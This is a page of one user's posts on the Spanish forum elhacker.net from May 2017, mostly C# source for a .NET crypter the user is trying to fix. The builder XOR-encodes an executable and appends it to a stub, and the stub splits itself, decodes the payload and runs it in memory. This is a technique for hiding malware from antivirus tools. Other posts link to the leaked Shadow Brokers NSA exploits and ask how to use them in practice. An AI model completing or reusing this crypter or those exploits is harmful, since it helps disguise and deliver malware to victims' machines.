elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Píldoras formativas en seguridad de la información


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ... 49
51  Seguridad Informática / Análisis y Diseño de Malware / Re: Enlaces y documentación sobre EternalBlue (Ataque Telefonica, Ransomware 2017) en: 19 Mayo 2017, 19:03
Gracias por la documentación.
pero dejas de tener carpetas compartidas... a quien no lo use, esta bien
En cuanto a esto aora mismo hay un exploit de los shadowbrokers el ETERNALCHAMPION que afecta al protocolo SMB 1.0 creo que ya actualizando el wndows del todo no sería vulnerable.

En cuanto a esto que dijeron en el post, Si tienes mas info puedes postearlo en este lugar, bueno yo recomendaría como me dijeron en el foro ver la lista de exploits de los shadowbrokers:
https://github.com/misterch0c/shadowbroker
El leak de los shadowbrokers explicado:
https://community.rapid7.com/community/infosec/blog/2017/04/18/the-shadow-brokers-leaked-exploits-faq

Y luego hacer un poc de cada uno, ya sea en python o pentesting para su estudio. salu2
52  Seguridad Informática / Bugs y Exploits / Re: NSA leak exploits shadow brokers---- AYUDA WINDOS 8 AND WINDOWS SERVER 2012 en: 19 Mayo 2017, 18:27
Se refiere al segundo leak: https://github.com/misterch0c/shadowbroker

En twitter hay mucha info sobre los exploits ésos y cómo usarlos.

Saludos!
Hola disculpa por reabrir el tema después de tanto tiempo si , estuvo fabuloso la fuente que pusistes bien descritos aún así busque en twitter y no encontre mucha información practica de como poner en practica estos exploits. disculpa las molestias, gracias..
53  Programación / .NET / Re: Ayuda con este crypter en .net en: 13 Mayo 2017, 20:13
Hola Ragaza,

la verdad que no entiendo. Es eso una instruccion para la consola a para un programa. Necesito el proyecto completo. Subelo en internet.

O dime con un ejemplo que es lo que quieres hacer por favor.

Gracias y saludos!
Hola tick tack si tienes tiempo libre y ganas de programar avisame por pm y método de contacto así avanzamos juntos en c# en nuestros ratos libres y podemos hacer aportes. salu2.
54  Programación / .NET / Re: [SOURCE-CODE][VB] Elektro User Controls - Controles de usuario para WindowsForms en: 13 Mayo 2017, 14:26
Osea son controles a nivel usuario totalmente hechos por ti y personalizados por ti? Asombroso! Gracias!
55  Programación / ASM / Re: ensamblador en: 10 Mayo 2017, 22:08
osea ensamblador pero en laseccion equivocada? reescribir todo el código para otro pero que ide usas si usas flat assembler soporta todos los intel/pentium.
56  Programación / .NET / Re: Ayuda con este crypter en .net en: 10 Mayo 2017, 21:35
Hola Ragaza,

me puedes pasar el proyecto completo por favor?

Gracias y saludos!
Hola no me fije que posteastes en el post.
El código del stub es:
Código:
using System;
using System.Collections.Generic;
using System.Data;
using System.Text;
using System.Windows.Forms;
using System.IO;
using System.Runtime.InteropServices;
using System.Resources;
using System.Security.Cryptography;
using System.Reflection;
using Microsoft.Win32;

namespace skip
{
    static class Program
    {
        /// <summary>
        /// MAIN
        /// </summary>
        [STAThread]
        static void Main()
        {
        string appDataPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            Application.EnableVisualStyles();
            Application.SetCompatibleTextRenderingDefault(false);
            //Application.Run(new Form1());

//leemos el byte array
byte[] file = File.ReadAllBytes(System.Reflection.Assembly.GetExecutingAssembly().Location);

//obtenemos la string
string str = System.Text.Encoding.ASCII.GetString(file);
string[] arr=str.Split(new string[] { "BLAUMOLAMUCHO" }, StringSplitOptions.None);
string a = arr[0];
string b = arr[1];

/*Console.WriteLine(a);
Console.WriteLine("------------------------------");
Console.WriteLine(b);
Console.ReadKey();*/


byte[] encodedBytes = Encoding.ASCII.GetBytes(a);
Stream stream = new MemoryStream(encodedBytes);
            FileStream fileStream = new FileStream(@"tola.exe", FileMode.Create, FileAccess.Write);
            for (int i = 0; i < stream.Length; i++)
                fileStream.WriteByte((byte)stream.ReadByte());
            //RunInternal(encodedBytes,"1234");
           


           
         }
       
        private static void RunInternal(byte[] exeName, String pass)
        {
            //Read the raw bytes of the file
            byte[] resourcesBuffer = exeName;

            //Decrypt bytes from payload
            byte[] decryptedBuffer = null;
            decryptedBuffer = decryptBytes(resourcesBuffer, pass);

         

            //If .NET executable -> Run
            if (System.Text.Encoding.ASCII.GetString(decryptedBuffer).Contains("</assembly>")) //Esto devuelve false
            {
                //Load the bytes as an assembly
                Assembly exeAssembly = Assembly.Load(decryptedBuffer);

                //Execute the assembly
                object[] parameters = new object[1];                //Don't know why but fixes TargetParameterCountException
           
                try{
                exeAssembly.EntryPoint.Invoke(null, parameters);
                }catch (Exception ex){
                Console.WriteLine(ex);
                Console.ReadKey();
                }
            }
            else
            {
                Console.WriteLine(Encoding.ASCII.GetString(decryptedBuffer));
                Console.ReadKey();
            }
 
        }

        /// <summary>
        /// Decrypt the Loaded Assembly Bytes
        /// </summary>
        /// <param name="payload"></param>
        /// <returns>Decrypted Bytes</returns>
        private static byte[] decryptBytes(byte[] bytes, String pass)
        {
            byte[] XorBytes = Encoding.Unicode.GetBytes(pass);

            for (int i = 0; i < bytes.Length; i++)
            {
                bytes[i] ^= XorBytes[i % XorBytes.Length];
            }

            return bytes;
        }
    }
}

Y el crypter es:
Código:
using System;
using System.Text;
using System.IO;
using System.Collections.Generic;
namespace Crypter
{
    class Program
    {
        [STAThread]
        static void Main(string[] args)
        {
            //No Arguments -> Exit
            if (args.Length < 2)
            {
                Console.WriteLine("Syntax: crypter.exe <Exe/Dll to get Encrypted> <Password> (Optional: output file name)");
                Environment.Exit(0);
            }

            String file = args[0];
            String pass = args[1];
            String outFile = "Crypted.exe";

            //If Output Name is specified -> Set it
            if (args.Length == 3)
            {
                outFile = args[2];
            }

            //File doesn't exist -> Exit
            if (!File.Exists(file))
            {
                Console.WriteLine("[!] The selected File doesn't exist!");
                Environment.Exit(0);
            }

            //Everything seems fine -> Reading bytes
            Console.WriteLine("[*] Reading Data...");
            byte[] plainBytes = File.ReadAllBytes(file);

            //Yep, got bytes -> Encoding
            Console.WriteLine("[*] Encoding Data...");
            byte[] encodedBytes = encodeBytes(plainBytes, pass);

            Console.WriteLine("[*] Save to Output File... ");

//Leer el stub
Console.WriteLine("[*] Reading Stub...");
byte[] Stub = File.ReadAllBytes("Stub.exe");

//byte separador
string strseperate = "BLAUMOLAMUCHO";
    byte[] toBytes = Encoding.ASCII.GetBytes(strseperate);
    //byte[] toBytes = new byte[30];
   
//write bytes
//var stream
            //Stream stream = Assembly.GetExecutingAssembly().GetManifestResourceStream("skip.skip.exe");
            //Console.WriteLine(stream);
            var s = new MemoryStream();
s.Write(Stub, 0, Stub.Length);
s.Write(toBytes, 0, toBytes.Length);
s.Write(encodedBytes, 0, encodedBytes.Length);
var b3 = s.ToArray();
Stream stream = new MemoryStream(b3);


            //Stream stream = new MemoryStream(encodedBytes);
            FileStream fileStream = new FileStream(@"out.exe", FileMode.Create, FileAccess.Write);
            for (int i = 0; i < stream.Length; i++)
                fileStream.WriteByte((byte)stream.ReadByte());

            Console.WriteLine("Done!");

            Console.WriteLine("\n[*] File successfully encoded!");
        }
        private static byte[] encodeBytes(byte[] bytes, String pass)
        {
            byte[] XorBytes = Encoding.Unicode.GetBytes(pass);

            for (int i = 0; i < bytes.Length; i++)
            {
                bytes[i] ^= XorBytes[i % XorBytes.Length];
            }

            return bytes;
        }
    }
}

El problema es que estaba haciendo con un delimitador pero si conviertes un byte array a cadena en mi caso lo muestra y lo escribes un .exe puede corromperse.
57  Programación / ASM / Re: Codigo en lenguaje de ensamblador MIPS en: 10 Mayo 2017, 16:47
donde esta el error que has intentado? así podria resolverlo.
58  Programación / .NET / Ayuda con este crypter en .net en: 9 Mayo 2017, 13:41
Va estaba intentando cambiar un crypter para que lo haga directamente del stub el problema es el sigiente.
no sé como podría juntar dos byte arrays con un delimitador  y que cuando arranque mi programa sea capaz de obtenerlos por medio de un split.
el código es el siguiente.
Código:
//Everything seems fine -> Reading bytes
Console.WriteLine("[*] Reading Data...");
byte[] plainBytes = File.ReadAllBytes(file);

//Yep, got bytes -> Encoding
Console.WriteLine("[*] Encoding Data...");
byte[] encodedBytes = encodeBytes(plainBytes, pass);

Console.WriteLine("[*] Save to Output File... ");

//Leer el fichero
Console.WriteLine("[*] Reading fichero...");
byte[] Stub = File.ReadAllBytes("rutafichero");

// ::: Create new List of bytes
var list = new List<byte>();
list.AddRange(encodedBytes);
list.AddRange(Stub);

// ::: Call ToArray to convert List to array
byte[] resultado = list.ToArray();

//write bytes
File.WriteAllBytes(outFile, resultado);

//File.WriteAllBytes(outFile, encodedBytes);
Console.WriteLine("Done!");

Console.WriteLine("\n[*] File successfully encoded!");
Entonces juntare ambos pero luego los separaré por medio del stub. Saludos y gracias.
59  Foros Generales / Dudas Generales / Copia de seguridad de todo mi sistema/particion windows en: 5 Mayo 2017, 15:33
Como dice el proverbio es mejor prevenir que curar.  Entonces había pensado en instalar algun programa para hacer una copia de seguridad de toda mi partición (principalmente lo hago para conservar ficheros,directorios que no querría que se me borrasen) o es mejor hacer una copia directamente del directorio de la partición. Saludos y gracias!
60  Foros Generales / Dudas Generales / Re: Sistema de ficheros ext4 una maravilla en comparación con ntfs? en: 5 Mayo 2017, 02:07
Pues a lo mejor pienso seá problema de mi disco duro pienso porque es extraño que tardé tanto en mi windows.
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ... 49
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines